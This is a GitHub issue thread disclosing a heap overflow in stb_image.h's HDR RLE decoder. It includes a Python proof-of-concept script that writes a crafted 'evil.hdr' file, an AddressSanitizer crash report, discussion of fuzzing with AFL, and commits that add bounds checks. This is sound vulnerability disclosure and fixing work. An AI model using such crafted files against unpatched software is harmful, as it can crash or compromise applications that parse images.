stb_image.h: stbi__hdr_load heap overflow #317

Closed
cryptoad opened this Issue May 25, 2016 · 6 comments

Comments

Projects
None yet
4 participants
@cryptoad

There is a heap overflow condition in the HDR parsing due to the RLE decoding loop not checking that there is enough space in the allocated buffer.

An HDR triggering the vulnerability can be generated with the following Python script:

import struct

def main():
  h=b'#?RADIANCE\n'
  h+=b'FORMAT=32-bit_rle_rgbe\n'
  h+=b'\n'
  height=1
  width=0x3a
  h+=b'-Y %d +X %d\n'%(height,width)
  h+=struct.pack('>BBH',2,2,width)
  q=0x4343434343434343
  for i in range(4):
    h+=struct.pack('>B',128+(width-1))+b'B'
    h+=struct.pack('>B',3)+b'B'+struct.pack('>BB',(q>>(i<<3))&0xff,
                                                  (q>>(32+(i<<3)))&0xff)

  f=open('evil.hdr','wb')
  f.write(h)
  f.close()

if __name__=='__main__':
  main()

And here is the ASan report:

==8373==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009ea8 at pc 0x7f26b4438221 bp 0x7ffcb3d619f0 sp 0x7ffcb3d619e8
WRITE of size 1 at 0x611000009ea8 thread T0
    #0 0x7f26b4438220 in stbi__hdr_load third_party/stblib/stb_image.h:6237:44
    #1 0x7f26b4431d65 in stbi__load_main third_party/stblib/stb_image.h:964:20
    #2 0x7f26b4430a77 in stbi__load_flip third_party/stblib/stb_image.h:980:28
    #3 0x7f26b4430fbf in stbi_load_from_memory third_party/stblib/stb_image.h:1069:11
    #4 0x7f26b4430266 in main experimental/users/kostyak/ionfuzz/stb.cc:21:8
    #5 0x7f26b33c1ce7 in __libc_start_main (/usr/grte/v4/lib64/libc.so.6+0x38ce7)
    #6 0x7f26b4371f08 in _start /usr/grte/v4/debug-src/glibc-2.19/csu/../sysdeps/x86_64/start.S:108

0x611000009ea8 is located 0 bytes to the right of 232-byte region [0x611000009dc0,0x611000009ea8)
allocated by thread T0 here:
    #0 0x7f26b441aa3b in __interceptor_malloc third_party/llvm/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7f26b4431234 in stbi__malloc third_party/stblib/stb_image.h:900:12
    #2 0x7f26b443805e in stbi__hdr_load third_party/stblib/stb_image.h:6222:55
    #3 0x7f26b4431d65 in stbi__load_main third_party/stblib/stb_image.h:964:20
    #4 0x7f26b4430a77 in stbi__load_flip third_party/stblib/stb_image.h:980:28
    #5 0x7f26b4430fbf in stbi_load_from_memory third_party/stblib/stb_image.h:1069:11
    #6 0x7f26b4430266 in main experimental/users/kostyak/ionfuzz/stb.cc:21:8
    #7 0x7f26b33c1ce7 in __libc_start_main (/usr/grte/v4/lib64/libc.so.6+0x38ce7)
    #8 0x7f26b4371f08 in _start /usr/grte/v4/debug-src/glibc-2.19/csu/../sysdeps/x86_64/start.S:108
@nothings

This comment has been minimized.

Show comment
Hide comment
@nothings

nothings May 25, 2016

Owner

Is there a reason you're posting a script that generates the file rather than attaching the file?

Owner

nothings commented May 25, 2016

Is there a reason you're posting a script that generates the file rather than attaching the file?

@cryptoad

This comment has been minimized.

Show comment
Hide comment
@cryptoad

cryptoad May 26, 2016

Well the file itself would be a single instance of things gone wrong, while the script can be used to generate other edge cases and test a potential fix more thoroughly.

Well the file itself would be a single instance of things gone wrong, while the script can be used to generate other edge cases and test a potential fix more thoroughly.

@nothings

This comment has been minimized.

Show comment
Hide comment
@nothings

nothings May 26, 2016

Owner

Only if I have whatever fuzzing tool you're using? I don't even have python installed, so it's not particularly useful to me either way.

Owner

nothings commented May 26, 2016

Only if I have whatever fuzzing tool you're using? I don't even have python installed, so it's not particularly useful to me either way.

@cryptoad

This comment has been minimized.

Show comment
Hide comment
@cryptoad

cryptoad May 27, 2016

Well this one just generates an evil.hdr file that triggers the issue. There is no additional dependency on anything, just need Python. If you don't want to install Python you might be able to use an online compiler maybe, haven't tried any though.

cryptoad commented May 27, 2016

Well this one just generates an evil.hdr file that triggers the issue. There is no additional dependency on anything, just need Python. If you don't want to install Python you might be able to use an online compiler maybe, haven't tried any though.

@andrewla

This comment has been minimized.

Show comment
Hide comment
@andrewla

andrewla Jun 6, 2016

I've actually been doing a fuzz of the stb_image.h file and have independently identified most of the issues that @cryptoad has found here. I've been using AFL -- http://lcamtuf.coredump.cx/afl/ -- which is very easy to set up and get running.

For reference, here is a zip of the file produced by the above script, and I've reproed that it does seg fault.
evil.hdr.zip

andrewla commented Jun 6, 2016

I've actually been doing a fuzz of the stb_image.h file and have independently identified most of the issues that @cryptoad has found here. I've been using AFL -- http://lcamtuf.coredump.cx/afl/ -- which is very easy to set up and get running.

For reference, here is a zip of the file produced by the above script, and I've reproed that it does seg fault.
evil.hdr.zip

@cryptoad

This comment has been minimized.

Show comment
Hide comment
@cryptoad

cryptoad Jun 9, 2016

Attached is a diff that seems to fix the issues reported (and a couple more).
Do not take it as is though, you might want to double check it and do some regression testing to make sure nothing broke.

stblib-diff.txt

cryptoad commented Jun 9, 2016

Attached is a diff that seems to fix the issues reported (and a couple more).
Do not take it as is though, you might want to double check it and do some regression testing to make sure nothing broke.

stblib-diff.txt

rygorous added a commit to rygorous/stb that referenced this issue Aug 13, 2016

stb_image: Fix HDR/PSD RLE decoders.
Runs need to be bounds checked.

Fixes issues #315, #317.

rygorous added a commit to rygorous/stb that referenced this issue Oct 22, 2016

stb_image: Fix HDR/PSD RLE decoders.
Runs need to be bounds checked.

Fixes issues #315, #317.

@rygorous rygorous closed this Dec 4, 2016

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment